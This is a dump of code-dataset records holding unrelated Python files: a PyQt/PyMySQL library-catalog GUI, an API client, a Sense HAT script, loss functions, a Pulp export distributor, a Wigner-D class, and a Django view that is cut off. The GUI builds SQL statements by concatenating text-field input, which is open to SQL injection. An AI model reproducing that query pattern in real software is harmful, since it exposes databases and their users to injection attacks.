Ordenar itens da lista\r\n self.listaEd.clicked.connect(self.informaEditoraLista) \r\n\r\n # Botão para limpar a lista\r\n self.btnLimpaLista = QPushButton(self)\r\n self.btnLimpaLista.setText('Limpar Lista')\r\n self.btnLimpaLista.move(150,250)\r\n self.btnLimpaLista.clicked.connect(self.listaEd.clear)\r\n\r\n # Barra de menus\r\n self.menu = QMenuBar(self)\r\n self.menuArquivo = self.menu.addMenu('Arquivo')\r\n self.menuDados = self.menu.addMenu('Dados')\r\n self.menuAjuda = self.menu.addMenu('Ajuda')\r\n # Cadastrar autor\r\n self.cadastraAutor = QAction('Cadastrar Autor', self)\r\n self.menuDados.addAction(self.cadastraAutor)\r\n self.cadastraAutor.triggered.connect(self.abreJanelaAutor)\r\n # Cadastrar editora\r\n self.cadastraEditora = QAction('Cadastrar Editora', self)\r\n self.menuDados.addAction(self.cadastraEditora)\r\n self.cadastraEditora.triggered.connect(self.abreJanelaEditora)\r\n # Sair\r\n self.sair = QAction('Sair', self)\r\n self.menuArquivo.addAction(self.sair)\r\n self.sair.triggered.connect(self.fechaApp)\r\n self.menu.show()\r\n\r\n self.carregaJanela()\r\n\r\n \r\n################# Métodos ##################\r\n\r\n def consultaEditoras(self):\r\n # Preparar um cursor com o método .cursor()\r\n try:\r\n conectaBanco()\r\n with con.cursor() as c:\r\n # Criar a consulta e executá-la no banco\r\n sql = \"SELECT NomeEditora FROM tbl_editoras\"\r\n c.execute(sql)\r\n res = c.fetchall()\r\n # Criar lista com os dados retornados\r\n self.listaEditoras = []\r\n for linha in res:\r\n self.listaEditoras.append(linha['NomeEditora'])\r\n except Exception:\r\n msgProblemaBD()\r\n finally: \r\n # Desconectar do servidor\r\n con.close()\r\n\r\n def consultaLivro(self):\r\n try:\r\n conectaBanco()\r\n IdLivro = self.txtIdLivro.text()\r\n with con.cursor() as c:\r\n sql = \"SELECT NomeLivro FROM tbl_livros WHERE IdLivro = \" + IdLivro + \";\"\r\n c.execute(sql)\r\n res = c.fetchone()\r\n self.txtNomeLivro.setText(res['NomeLivro'])\r\n except Exception:\r\n msgProblemaBD()\r\n finally:\r\n con.close()\r\n\r\n def informaEditora(self):\r\n self.txtEditora.setText(self.cmbEditoras.currentText())\r\n\r\n def informaEditoraLista(self):\r\n self.editora = self.listaEd.currentItem()\r\n self.txtEditora.setText(self.editora.text())\r\n\r\n def abreJanelaAutor(self):\r\n self.janelaAutor = JanelaAutor(self)\r\n self.janelaAutor.show()\r\n\r\n def abreJanelaEditora(self):\r\n self.janelaEditora = JanelaEditora(self)\r\n self.janelaEditora.show()\r\n\r\n def fechaApp(self):\r\n self.close()\r\n\r\n def carregaJanela(self):\r\n self.setGeometry(self.esq, self.topo, self.lar, self.alt)\r\n self.setWindowTitle(self.titulo)\r\n self.setStyleSheet('background-color:lightgreen')\r\n self.show()\r\n\r\n#------------ Janela de Autores ------------#\r\n\r\nclass JanelaAutor(QMainWindow):\r\n def __init__(self, parent=None):\r\n super(JanelaAutor, self).__init__(parent)\r\n\r\n self.topo = 300\r\n self.esq = 300\r\n self.alt = 700\r\n self.lar = 500\r\n self.titulo = 'Cadastrar Autores'\r\n\r\n # Criar botão para cadastro de autores\r\n self.btnCadastraAutor = QPushButton('Cadastrar Autor', self)\r\n self.btnCadastraAutor.move(100, 220)\r\n self.btnCadastraAutor.setStyleSheet('background-color:#0000CC;color:yellow;font:bold')\r\n self.btnCadastraAutor.setToolTip('Clique aqui para cadastrar um novo autor')\r\n self.btnCadastraAutor.clicked.connect(self.cadastraAutor)\r\n self.btnCadastraAutor.clicked.connect(self.carregaAutores)\r\n\r\n # Caixas de texto para cadastro de autor:\r\n self.lblNomeAutor = QLabel(self)\r\n self.lblNomeAutor.move(100,80)\r\n self.lblNomeAutor.resize(250,30)\r\n self.lblNomeAutor.setText('Nome do autor:')\r\n self.txtNomeAutor = QLineEdit(self) \r\n self.txtNomeAutor.move(100,110)\r\n self.txtNomeAutor.resize(200,30)\r\n self.lblSobrenomeAutor = QLabel(self)\r\n self.lblSobrenomeAutor.move(100,150)\r\n self.lblSobrenomeAutor.resize(250,30)\r\n self.lblSobrenomeAutor.setText('Sobrenome do autor:')\r\n self.txtSobrenomeAutor = QLineEdit(self)\r\n self.txtSobrenomeAutor.move(100,180)\r\n self.txtSobrenomeAutor.resize(250,30)\r\n\r\n # Tabela de Autores\r\n self.tabelaAutores = QTableWidget(self)\r\n self.tabelaAutores.move(100,300)\r\n self.tabelaAutores.resize(250,300)\r\n \r\n\r\n self.configuraJanela()\r\n\r\n def configuraJanela(self):\r\n self.setGeometry(self.esq, self.topo, self.lar, self.alt)\r\n self.setWindowTitle(self.titulo)\r\n self.setStyleSheet('background-color:lightblue')\r\n self.carregaAutores()\r\n\r\n def cadastraAutor(self):\r\n try:\r\n conectaBanco()\r\n self.nomeAutor = self.txtNomeAutor.text()\r\n self.sobrenomeAutor = self.txtSobrenomeAutor.text()\r\n with con.cursor() as cur: \r\n sql = \"INSERT INTO tbl_autores (NomeAutor, SobrenomeAutor) VALUES \" + \"('\" + self.nomeAutor + \"','\" + self.sobrenomeAutor + \"');\"\r\n cur.execute(sql)\r\n con.commit()\r\n cur.close()\r\n except Exception:\r\n msgProblemaBD()\r\n else:\r\n msgSucesso()\r\n finally:\r\n con.close()\r\n\r\n def carregaAutores(self):\r\n try:\r\n conectaBanco()\r\n with con.cursor() as c:\r\n sql = 'SELECT * FROM tbl_autores;'\r\n c.execute(sql)\r\n self.resAutores = c.fetchall()\r\n except Exception:\r\n msgProblemaBD()\r\n else:\r\n self.linhas = len(self.resAutores)\r\n self.colunas = len(self.resAutores[0])\r\n self.tabelaAutores.setRowCount(self.linhas)\r\n self.tabelaAutores.setColumnCount(self.colunas)\r\n \r\n # Ajustar cabeçalho e dimensões da tabela\r\n self.tabelaAutores.setHorizontalHeaderLabels((list(self.resAutores[0].keys())))\r\n self.tabelaAutores.horizontalHeader().setSectionResizeMode(QHeaderView.ResizeToContents)\r\n \r\n for l in range(self.linhas):\r\n for c in range(self.colunas):\r\n item = (list(self.resAutores[l].values())[c])\r\n self.tabelaAutores.setItem(l, c, QTableWidgetItem(str(item)))\r\n finally: \r\n # Desconectar do servidor\r\n con.close()\r\n\t\r\n#------------ Janela de Editoras ------------#\r\n\r\nclass JanelaEditora(QMainWindow):\r\n def __init__(self, parent=None):\r\n super(JanelaEditora, self).__init__(parent)\r\n\r\n self.topo = 100\r\n self.esq = 300\r\n self.alt = 550\r\n self.lar = 500\r\n self.titulo = 'Cadastrar Editoras' \r\n\r\n # Caixa de texto para cadastro de editora:\r\n self.lblNomeEditora = QLabel(self)\r\n self.lblNomeEditora.move(100,80)\r\n self.lblNomeEditora.resize(250,30)\r\n self.lblNomeEditora.setText('Nome da editora:')\r\n self.txtNomeEditora = QLineEdit(self) \r\n self.txtNomeEditora.move(100,110)\r\n self.txtNomeEditora.resize(200,30)\r\n\r\n # Criar botão para cadastro de editoras\r\n self.btnCadastraEditora = QPushButton('Cadastrar Editora', self)\r\n self.btnCadastraEditora.move(100, 150)\r\n self.btnCadastraEditora.setStyleSheet('background-color:#0000CC;color:yellow;font:bold')\r\n self.btnCadastraEditora.setToolTip('Clique aqui para cadastrar uma nova editora')\r\n self.btnCadastraEditora.clicked.connect(self.cadastraEditora)\r\n self.btnCadastraEditora.clicked.connect(self.carregaEditoras)\r\n\r\n # Tabela de Editoras\r\n self.tabelaEditoras = QTableWidget(self)\r\n self.tabelaEditoras.move(100,200)\r\n self.tabelaEditoras.resize(250,300)\r\n \r\n # Configurar janela\r\n self.configuraJanela()\r\n\r\n def configuraJanela(self):\r\n self.setGeometry(self.esq, self.topo, self.lar, self.alt)\r\n self.setWindowTitle(self.titulo)\r\n self.setStyleSheet('background-color:lightblue')\r\n self.carregaEditoras()\r\n\r\n def cadastraEditora(self):\r\n try:\r\n conectaBanco()\r\n self.nomeEditora = self.txtNomeEditora.text()\r\n with con.cursor() as cur: \r\n sql = \"INSERT INTO tbl_editoras (NomeEditora) VALUES \" + \"('\" + self.nomeEditora + \"');\"\r\n cur.execute(sql)\r\n con.commit()\r\n cur.close()\r\n except Exception:\r\n msgProblemaBD()\r\n else:\r\n msgSucesso()\r\n finally:\r\n con.close()\r\n\r\n def carregaEditoras(self):\r\n try:\r\n conectaBanco()\r\n with con.cursor() as c:\r\n sql = 'SELECT * FROM tbl_editoras;'\r\n c.execute(sql)\r\n self.resEditoras = c.fetchall()\r\n except Exception:\r\n msgProblemaBD()\r\n else:\r\n self.linhas = len(self.resEditoras)\r\n self.colunas = len(self.resEditoras[0])\r\n self.tabelaEditoras.setRowCount(self.linhas)\r\n self.tabelaEditoras.setColumnCount(self.colunas)\r\n \r\n # Ajustar cabeçalho e dimensões da tabela\r\n self.tabelaEditoras.setHorizontalHeaderLabels((list(self.resEditoras[0].keys())))\r\n self.tabelaEditoras.horizontalHeader().setSectionResizeMode(QHeaderView.ResizeToContents)\r\n \r\n for l in range(self.linhas):\r\n for c in range(self.colunas):\r\n item = (list(self.resEditoras[l].values())[c])\r\n self.tabelaEditoras.setItem(l, c, QTableWidgetItem(str(item)))\r\n finally: \r\n # Desconectar do servidor\r\n con.close()\r\n\r\n#-------------- Rotina Principal --------------#\r\n \r\nif __name__ == '__main__':\r\n app = QApplication(sys.argv)\r\n app.setStyle('Fusion')\r\n tela = Janela()\r\n sys.exit(app.exec_())\r\n","sub_path":"PyQt - Conexão a banco com PyMySQL (POO).py","file_name":"PyQt - Conexão a banco com PyMySQL (POO).py","file_ext":"py","file_size_in_byte":13203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"87846987","text":"from qsGenerator import queryURLBuilder\nfrom TableSchemaCreator import createSchema\nfrom TableCreator import populateTable\nfrom iDigBioQuery import idigbioQuery\nfrom DBInfo import delTable\nimport urllib.request\nimport json\nimport sys\n\n\ndef searchRecords(rq, table_name, limit=None):\n '''Function that returns a dictionary of records found using the rq dictionary\n query parameters. Requires the rq dictionary and database table name as\n arguments, parameter \"limit\" is optional (limits no. of records retreived) \n '''\n #Endpoint for conducting queries through API with rq search terms\n endpoint = \"http://127.0.0.1:5000/\" + table_name + \"/search?\"\n \n #Build query URL using search terms in rq\n url = queryURLBuilder(endpoint, rq, limit)\n \n #Reading data from the URL constructed (requires API Server running)\n try:\n data = urllib.request.urlopen(url)\n except urllib.error.URLError as e:\n print(\"Invalid URL address.\")\n sys.exit(0)\n \n #Convert data read from webpage to JSON format, python dictionary\n result_dict = json.loads(data.read().decode())\n \n return result_dict\n\n\ndef viewRecord(uuid, table_name):\n '''Function that returns a single record from database using the record's\n uuid, which is provided as an argument to the function along with the\n name of the table to be queried\n '''\n #API Endpoint for retrieving individual record by uuid\n endpoint = \"http://127.0.0.1:5000/view/\" + table_name + \"/\"\n \n #URL constructed by appending user defined uuid to endpoint\n url = endpoint + uuid\n \n #Reading data from the URL constructed (requires API Server running)\n try:\n data = urllib.request.urlopen(url)\n except urllib.error.URLError as e:\n print(\"Invalid URL address.\")\n sys.exit(0)\n \n #Converting record to JSON format\n record = json.loads(data.read().decode())\n \n return record\n\ndef createTable(rq, table_name, limit=None):\n '''Function that allows user to create a table in a PostgreSQL database\n that contains the results of a query to idigbio.\n \n Takes rq dictionary (containing query params),\n table_name string (name of table to be created in DB) and\n limit int (max no. of records to be returned) as arguments.\n '''\n #Conduct query to idigbio, retrieves results as dict\n results = idigbioQuery(rq, limit)\n \n #Create table & appropriate fields based on query result\n createSchema(results, table_name)\n \n #Enter data in query into table\n populateTable(results, table_name)\n \n \ndef deleteTable(table_name):\n '''Function for deleting a table from the local database defined in the\n DBInfo script. Takes table's name as argument and notifies user of\n success/failure status of deletion.\n '''\n #Table deletion function\n delTable(table_name)\n\n \n \n ","sub_path":"APIPrototype/API.py","file_name":"API.py","file_ext":"py","file_size_in_byte":2914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"113177426","text":"#! /usr/bin/python3 -i\n# Hey this script is meant to be used in a interactive session.\n# dran 04/19\n\nimport time\nimport random\nimport numpy as np\nimport sense_hat\nimport constants as C\n\n\nclass MyOwnHat(sense_hat.SenseHat):\n \n def clear_display(self):\n # this is obviously a little slow but it is less typing :p\n self.set_pixels(C.BLANK)\n \n def random_lights(self,duration):\n \n def _individual_light(hat):\n x = random.randint(0, 7)\n y = random.randint(0, 7)\n hat.set_pixel(x, y, random.choice(C.COLORS_LIST))\n \n start_time = time.time()\n while time.time() - start_time <= duration:\n _individual_light(self)\n time.sleep(0.05)\n \n self.clear_display()\n\nif __name__ == \"__main__\":\n hat = MyOwnHat()\n hat.random_lights(10)\n\n\n \n\n","sub_path":"light_tricks.py","file_name":"light_tricks.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"51758986","text":"import numpy as np\n\ndef mean_squared_error(y_true, y_pred, *args):\n \"\"\"\n # Squared Error derivative\n :param y_true: Class labels {-1 or 1} (discrete)\n :param y_pred: Network output [-1 to 1] (continuous)\n :return:\n \"\"\"\n return y_true - y_pred\n\n\ndef gmean_error(y_true, y_pred, cm_approx, n1, n2):\n \"\"\"\n Geometric Error derivative\n :param y_true: Class labels {-1 or 1}\n :param y_pred: NOT USED\n :param cm_approx: pre-computed approximate confusion matrix (which uses y_preds)\n :param n1: number of class labels (class 0)\n :param n2: number of class lables (class 1)\n :return:\n \"\"\"\n dscale = 16. * n1 * n2\n t = 0.5 * ((1 + y_true) * cm_approx.A[0][0])\n t = t - (0.5 * (1 - y_true) * cm_approx.A[1][1])\n return t / dscale # dscale := 16*n1*n2\n\n\ndef cross_entropy_error(y_true, y_pred, *args):\n \"\"\"\n Cross entropy error\n :param y_true:\n :param y_pred:\n :param cm_approx:\n :param n1:\n :param n2:\n :return:\n \"\"\"\n t_k = (np.float64(y_true) + 1.) / 2. # Convert class label from {-1,1} -> {0,1}\n a_k = (np.float64(y_pred) + 1.) / 2. # Convert net output from {-1,1} into {0,1}\n a_k = np.clip(a_k, 0.00000001, 0.99999999) # Added clip to stop numpy log error\n if a_k != 0:\n t = (t_k / a_k) - ((1 - t_k) / (1 - a_k))\n else:\n t = (t_k / a_k) - ((1 - t_k) / (1 - a_k))\n return t","sub_path":"model/error.py","file_name":"error.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"412128668","text":"# -*- coding: utf-8 -*-\n#\n# Copyright (c) 2013 Red Hat, Inc.\n#\n# This software is licensed to you under the GNU General Public\n# License as published by the Free Software Foundation; either version\n# 2 of the License (GPLv2) or (at your option) any later version.\n# There is NO WARRANTY for this software, express or implied,\n# including the implied warranties of MERCHANTABILITY,\n# NON-INFRINGEMENT, or FITNESS FOR A PARTICULAR PURPOSE. You should\n# have received a copy of GPLv2 along with this software; if not, see\n# http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.\n\nfrom gettext import gettext as _\nimport os\nimport shutil\n\nfrom pulp.plugins.conduits.repo_publish import RepoPublishConduit\nfrom pulp.plugins.distributor import GroupDistributor\nfrom pulp.server.exceptions import PulpDataException\n\n# Import export_utils from this directory, which is not in the python path\nimport export_utils\nfrom pulp_rpm.common import constants, ids, models\nfrom pulp_rpm.yum_plugin import util\n\n_logger = util.getLogger(__name__)\n\n# Things left to do:\n# Cancelling a publish operation is not currently supported.\n# Published ISOs are left in the working directory. See export_utils.publish_isos to fix this.\n# This is not currently in the python path. When that gets fixed, the imports should be fixed.\n\n\nclass GroupISODistributor(GroupDistributor):\n\n def __init__(self):\n super(GroupISODistributor, self).__init__()\n self.cancelled = False\n self.summary = {}\n self.details = {}\n\n @classmethod\n def metadata(cls):\n \"\"\"\n Used by Pulp to classify the capabilities of this distributor. The\n following keys must be present in the returned dictionary:\n\n * id - Programmatic way to refer to this distributor. Must be unique\n across all distributors. Only letters and underscores are valid.\n * display_name - User-friendly identification of the distributor.\n * types - List of all content type IDs that may be published using this\n distributor.\n\n This method call may be made multiple times during the course of a\n running Pulp server and thus should not be used for initialization\n purposes.\n\n :return: description of the distributor's capabilities\n :rtype: dict\n \"\"\"\n return {\n 'id': ids.TYPE_ID_DISTRIBUTOR_GROUP_EXPORT,\n 'display_name': _('Group Export Distributor'),\n 'types': [models.RPM.TYPE, models.SRPM.TYPE, models.DRPM.TYPE, models.Errata.TYPE,\n models.Distribution.TYPE, models.PackageCategory.TYPE, models.PackageGroup.TYPE]\n }\n\n def validate_config(self, repo_group, config, config_conduit):\n \"\"\"\n Allows the distributor to check the contents of a potential configuration\n for the given repository. This call is made both for the addition of\n this distributor to a new repository group, as well as updating the configuration\n for this distributor on a previously configured repository.\n\n The return is a tuple of the result of the validation (True for success,\n False for failure) and a message. The message may be None and is unused\n in the success case. If the message is not None, i18n is taken into\n consideration when generating the message.\n\n The related_repo_groups parameter contains a list of other repository groups that\n have a configured distributor of this type. The distributor configurations\n is found in each repository group in the \"plugin_configs\" field.\n\n :param repo_group: metadata describing the repository to which the configuration applies\n :type repo_group: pulp.plugins.model.Repository\n :param config: plugin configuration instance\n :type config: pulp.plugins.config.PluginCallConfiguration\n :param config_conduit: Configuration Conduit;\n :type config_conduit: pulp.plugins.conduits.repo_validate.RepoConfigConduit\n\n :return: tuple of (bool, str) to describe the result\n :rtype: tuple\n \"\"\"\n return export_utils.validate_export_config(config)\n\n def publish_group(self, repo_group, publish_conduit, config):\n \"\"\"\n Publishes the given repository group.\n\n :param repo_group: metadata describing the repository group\n :type repo_group: pulp.plugins.model.RepositoryGroup\n :param publish_conduit: provides access to relevant Pulp functionality\n :type publish_conduit: pulp.plugins.conduits.repo_publish.RepoGroupPublishConduit\n :param config: plugin configuration\n :type config: pulp.plugins.config.PluginConfiguration\n :return: report describing the publish run\n :rtype: pulp.plugins.model.PublishReport\n \"\"\"\n # First, validate the configuration because there may be override config options, and currently,\n # validate_config is not called prior to publishing by the manager.\n valid_config, msg = export_utils.validate_export_config(config)\n if not valid_config:\n raise PulpDataException(msg)\n\n _logger.info('Beginning export of the following repository group: [%s]' % repo_group.id)\n\n # The progress report for a group publish\n progress_status = {\n constants.PROGRESS_REPOS_KEYWORD: {constants.PROGRESS_STATE_KEY: constants.STATE_NOT_STARTED},\n constants.PROGRESS_ISOS_KEYWORD: {constants.PROGRESS_STATE_KEY: constants.STATE_NOT_STARTED},\n constants.PROGRESS_PUBLISH_HTTP: {constants.PROGRESS_STATE_KEY: constants.STATE_NOT_STARTED},\n constants.PROGRESS_PUBLISH_HTTPS: {constants.PROGRESS_STATE_KEY: constants.STATE_NOT_STARTED}\n }\n\n def progress_callback(progress_keyword, status):\n \"\"\"\n Progress callback used to update the progress report for the publish conduit\n\n :param progress_keyword: The keyword to assign the status to in the progress report dict\n :type progress_keyword: str\n :param status: The status to assign to the keyword.\n :type status: dict\n \"\"\"\n progress_status[progress_keyword] = status\n publish_conduit.set_progress(progress_status)\n\n # Before starting, clean out the working directory. Done to remove last published ISOs\n shutil.rmtree(repo_group.working_dir, ignore_errors=True)\n os.makedirs(repo_group.working_dir)\n\n # Retrieve the configuration for each repository, the skip types, and the date filter\n packed_config = export_utils.retrieve_group_export_config(repo_group, config)\n rpm_repositories, self.date_filter = packed_config\n\n # Update the progress for the repositories section\n repos_progress = export_utils.init_progress_report(len(rpm_repositories))\n progress_callback(constants.PROGRESS_REPOS_KEYWORD, repos_progress)\n\n # For every repository, extract the requested types to the working directory\n for repo_id, working_dir in rpm_repositories:\n # Create a repo conduit, which makes sharing code with the export and yum distributors easier\n repo_conduit = RepoPublishConduit(repo_id, ids.EXPORT_GROUP_DISTRIBUTOR_ID)\n\n # If there is a date filter perform an incremental export, otherwise do everything\n if self.date_filter:\n result = export_utils.export_incremental_content(working_dir, repo_conduit,\n self.date_filter)\n else:\n result = export_utils.export_complete_repo(repo_id, working_dir, repo_conduit, config)\n self.summary[repo_id] = result[0]\n self.details[repo_id] = result[1]\n\n repos_progress[constants.PROGRESS_ITEMS_LEFT_KEY] -= 1\n repos_progress[constants.PROGRESS_NUM_SUCCESS_KEY] += 1\n progress_callback(constants.PROGRESS_REPOS_KEYWORD, repos_progress)\n\n repos_progress[constants.PROGRESS_STATE_KEY] = constants.STATE_COMPLETE\n progress_callback(constants.PROGRESS_REPOS_KEYWORD, repos_progress)\n\n # If there was no export directory, publish via ISOs\n if not config.get(constants.EXPORT_DIRECTORY_KEYWORD):\n self._publish_isos(repo_group, config, progress_callback)\n\n for repo_id, repo_dir in rpm_repositories:\n if repo_id in self.details and len(self.details[repo_id]['errors']) != 0:\n return publish_conduit.build_failure_report(self.summary, self.details)\n\n self.summary['repositories_exported'] = len(rpm_repositories)\n self.summary['repositories_skipped'] = len(repo_group.repo_ids) - len(rpm_repositories)\n\n return publish_conduit.build_success_report(self.summary, self.details)\n\n def _publish_isos(self, repo_group, config, progress_callback=None):\n \"\"\"\n This just decides what the http and https publishing directories should be, cleans them up,\n and then calls publish_isos method in export_utils\n\n :param repo_group: metadata describing the repository group. Used to retrieve the\n working directory and group id.\n :type repo_group: pulp.plugins.model.RepositoryGroup\n :param config: plugin configuration instance\n :type config: pulp.plugins.config.PluginCallConfiguration\n :param progress_callback: callback to report progress info to publish_conduit. This function is\n expected to take the following arguments: type_id, a string, and\n status, which is a dict\n :type progress_callback: function\n \"\"\"\n\n http_publish_dir = os.path.join(constants.GROUP_EXPORT_HTTP_DIR, repo_group.id).rstrip('/')\n https_publish_dir = os.path.join(constants.GROUP_EXPORT_HTTPS_DIR, repo_group.id).rstrip('/')\n image_prefix = config.get(constants.ISO_PREFIX_KEYWORD) or repo_group.id\n\n # Clean up the old export publish directories.\n shutil.rmtree(http_publish_dir, ignore_errors=True)\n shutil.rmtree(https_publish_dir, ignore_errors=True)\n\n # If publishing isn't enabled for http or https, set the path to None\n if not config.get(constants.PUBLISH_HTTP_KEYWORD):\n http_publish_dir = None\n if not config.get(constants.PUBLISH_HTTPS_KEYWORD):\n https_publish_dir = None\n\n export_utils.publish_isos(repo_group.working_dir, image_prefix, http_publish_dir,\n https_publish_dir, config.get(constants.ISO_SIZE_KEYWORD),\n progress_callback)\n","sub_path":"plugins/pulp_rpm/plugins/distributors/export_distributor/groupdistributor.py","file_name":"groupdistributor.py","file_ext":"py","file_size_in_byte":10894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"132717727","text":"import torch\nfrom numpy import pi\n\n# Hack to avoid circular imports\nfrom lgn.g_lib import g_tau, g_tensor\nfrom lgn.g_lib import rotations as rot\n\nGTau = g_tau.GTau\nGTensor = g_tensor.GTensor\n\n\nclass GWignerD(GTensor):\n \"\"\"\n Core class for creating and tracking WignerD matrices.\n\n At the core of each `GWignerD` is a list of `torch.Tensors` with\n shape `(2*l+1, 2*l+1, 2)`, where:\n\n * `2*l+1` is the size of an irrep of weight `l`.\n * `2` corresponds to the real/imaginary parts of the complex dimension.\n\n Note\n ----\n\n For now, there is no batch or channel dimensions included. Although a\n G covariant network architecture with Wigner-D matrices is possible,\n the current scheme using PyTorch built-ins would be too slow to implement.\n A custom CUDA kernel would likely be necessary, and is a work in progress.\n\n Warning\n -------\n The constructor __init__() does not check that the tensor is actually\n a Wigner-D matrix, (that is an irreducible representation of the group G)\n so it is important to ensure that the input tensor is generated appropraitely.\n\n Parameters\n ----------\n\n data : iterable of of `torch.Tensor` with appropriate shape\n Input of a G vector.\n \"\"\"\n\n @property\n def zdim(self):\n return 0\n\n @property\n def bdim(self):\n return None\n\n @property\n def cdim(self):\n return None\n\n @property\n def rdim1(self):\n return 1\n\n @property\n def rdim2(self):\n return 2\n\n rdim = rdim2\n\n @property\n def keys(self):\n return self.keys()\n\n @staticmethod\n def _get_shape(batch, key, channels):\n return (2, (key[0] + 1) * (key[1] + 1), (key[0] + 1) * (key[1] + 1))\n\n def check_data(self, data):\n if any(part.numel() == 0 for part in data.values()):\n raise NotImplementedError(\n \"Non-zero parts in GWignerD not currrently enabled!\"\n )\n\n shapes = {key: part.shape for key, part in data.items()}\n\n zdims = {key: shape[self.zdim] for key, shape in shapes.items()}\n rdims = {\n key: (shape[self.rdim1], shape[self.rdim2]) for key, shape in shapes.items()\n }\n\n if not all(\n rdims[key][0] == (key[0] + 1) * (key[1] + 1)\n and rdims[key][1] == (key[0] + 1) * (key[1] + 1)\n for key in data.keys()\n ):\n raise ValueError(\n f\"Irrep dimension (dim={self.rdim}) of each tensor should have shape 2*l+1! Found: {rdims}\"\n )\n\n if not all(zdim == 2 for zdim in zdims.values()):\n raise ValueError(\n f\"Complex dimension (dim={self.zdim}) of each tensor should have length 2! Found: {zdims}\"\n )\n\n @staticmethod\n def _bin_op_type_check(type1, type2):\n if type1 == GWignerD and type2 == GWignerD:\n raise ValueError(\"Cannot multiply two GWignerD!\")\n\n @staticmethod\n def euler(maxdim, angles=None, device=None, dtype=None, requires_grad=False):\n \"\"\"\n Factory method to create a new `GWeight`.\n\n If `angles=None`, will generate a uniformly distributed random Euler\n angle and then instantiate a GWignerD accordingly.\n \"\"\"\n\n if angles is None:\n alpha, beta, gamma = torch.rand(3) * 2 * pi + 1j * torch.rand(3) * 2 * pi\n beta = beta / 2\n\n wigner_d = {\n (k, n): rot.LorentzD((k, n), alpha, beta, gamma, device=device, dtype=dtype)\n for k in range(maxdim)\n for n in range(maxdim)\n }\n\n return GWignerD(wigner_d)\n\n @staticmethod\n def rand(maxdim, device=None, dtype=None, requires_grad=False):\n \"\"\"Overwrite factor method inherited from `GTensor` since\n it would break covariance\"\"\"\n raise NotImplementedError(\"Does not make sense as it would break covariance!\")\n\n @staticmethod\n def randn(maxdim, device=None, dtype=None, requires_grad=False):\n \"\"\"Overwrite factor method inherited from `GTensor` since\n it would break covariance\"\"\"\n raise NotImplementedError(\"Does not make sense as it would break covariance!\")\n\n @staticmethod\n def zeros(maxdim, device=None, dtype=None, requires_grad=False):\n \"\"\"Overwrite factor method inherited from `GTensor` since\n it would break covariance\"\"\"\n raise NotImplementedError(\"Does not make sense as it would break covariance!\")\n\n @staticmethod\n def ones(maxdim, device=None, dtype=None, requires_grad=False):\n \"\"\"Overwrite factor method inherited from `GTensor` since\n it would break covariance\"\"\"\n raise NotImplementedError(\"Does not make sense as it would break covariance!\")\n","sub_path":"lgn/g_lib/g_wigner_d.py","file_name":"g_wigner_d.py","file_ext":"py","file_size_in_byte":4712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"279382802","text":"import re\nfrom .handler import Handler\n\nclass LogEventHandler(Handler):\n def __init__(self):\n super().__init__()\n\n def handles(self, event):\n return True\n\n def handle(self, g, event):\n company = event.actor.company\n if not company:\n company = \"unknown\"\n else:\n company = re.sub(r'\\W+', '', company).lower()\n\n self.logging.info('{} ({}): @{} -> {}'.format(event.repo.name, event.created_at, event.actor.login, event.type))\n self.monitoring_db.write('event', { 'value': 1 }, tags={ \n 'repo': event.repo.name,\n 'user': event.actor.login,\n 'company': company,\n 'type': event.type\n })\n if self.config.get('payload'):\n self.logging.info(' {}'.format(event.payload))\n\nLogEventHandler()\n","sub_path":"event/log_event_handler.py","file_name":"log_event_handler.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"24741863","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\n\n# Create your views here.\nfrom ortools.linear_solver import pywraplp\nimport joblib\nimport pandas as pd\nimport numpy as np\nfrom .models import VaccantRacks\n\nfrom itertools import product\nvc=[{'category':'A','rackname':'A1-B1-C1','capacity':100},{'category':'B','rackname':'A1-B1-C2','capacity':100}] \n\ndef home1(request):\n\treturn render(request,'calc/home.html')\n\ndef home(request):\n\tdf={}\n\tif request.method==\"POST\":\n\t\tall_vaccantracknames=VaccantRacks.objects.all()\n\t\tfor i in all_vaccantracknames:\n\t\t\tprint(i.category)\n\t\t\n\t\t# a0=int(request.POST['digit-1'])\n\t\t# b0=int(request.POST['digit-2'])\n\t\t# c0=int(request.POST['digit-3'])\n\t\t# a1=int(request.POST['digit-4'])\n\t\t# b1=int(request.POST['digit-5'])\n\t\t# c1=int(request.POST['digit-6'])\n\t\tname=int(request.POST['name'])\n\t\tweights=request.POST['weights']\n\t\t\n\n\t\tmodel=pd.read_pickle('lr_model.pickle')\n\t\tweights=list(map(int,weights.split()))\n\t\tn=[]\n\t\tn.append(name)\n\n\t\tl1=list(product(n, weights))\n\t\tprint(l1)\n\t\tvalues =str(model.predict(l1))\n\t\tprint(\"es\",values[1:-1])\n\t\tvalues=values[1:-1]\n\t\tprint(values)\n\t\tvalues=list(map(float,values.split()))\n\t\tif name==0:\n\t\t\tname='Phone'\n\t\telif name==1:\n\t\t\tname='Chairs'\n\t\telse:\n\t\t\tname='Kurti'\n\n\t\tA=['Phone', 'Books', 'Printers', 'Electric tiffins']\n\t\tB=['Accessories', 'Chairs', 'Electronic Games', 'Hankerchief', 'Shoes', 'Trousers']\n\t\tC=['Furnishings', 'Kurti', 'Pillows', 'Shirt', 'Spoons', 'Tables', 'Waterbottles']\n\t\tpname=request.POST['name']\n\t\tif name in A:\n\t\t\tracks=[i.rackname for i in all_vaccantracknames if i.category=='A']\n\t\t\tprint('A rack',racks)\n\t\telif name in B:\n\t\t\tracks=[i.rackname for i in all_vaccantracknames if i.category=='B']\n\t\t\tprint('B rack',racks)\n\t\telse:\n\t\t\tracks=[i.rackname for i in all_vaccantracknames if i.category=='C']\n\t\t\tprint('C rack',racks)\n\t\n\t\t#values=list(map(int,values.split()))\n\t\t\n\t\tdata = 